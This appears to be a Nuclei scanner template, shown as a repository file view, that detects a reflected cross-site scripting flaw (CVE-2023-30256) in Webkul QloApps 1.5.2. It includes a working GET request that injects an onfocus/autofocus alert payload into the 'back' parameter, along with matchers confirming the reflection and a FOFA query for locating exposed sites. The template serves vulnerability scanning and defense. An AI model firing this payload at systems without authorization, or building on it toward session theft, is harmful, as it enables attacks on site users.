nuclei-templates/http/cves/2023/CVE-2023-30256.yaml

57 lines
2.1 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2023-30256
info:
name: Webkul QloApps 1.5.2 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-07-07 09:38:49 +00:00
reference:
- https://github.com/webkul/hotelcommerce
- http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
- https://github.com/ahrixia/CVE-2023-30256
- https://nvd.nist.gov/vuln/detail/CVE-2023-30256
2023-07-11 19:49:27 +00:00
- https://qloapps.com/
2023-07-07 09:38:49 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-07-07 09:38:49 +00:00
cvss-score: 6.1
cve-id: CVE-2023-30256
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00895
epss-percentile: 0.8263
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:*
2023-07-07 09:38:49 +00:00
metadata:
verified: "true"
2023-09-06 11:43:37 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: webkul
product: qloapps
2024-05-31 19:23:20 +00:00
fofa-query: title="qloapps"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul
2023-07-07 09:38:49 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xss onfocus=alert(document.domain) autofocus= xss"
- "hasConfirmation"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a004730450220299c58ac9d6a22e1c49ef45f97057ebad174785e1ec42d9b942926d1a73e5dca022100a786b9078630f2acbfe99f890a7fc9e4f487ab208a16be633daefac19163d791:922c64590222798bb761d5b6d8e72950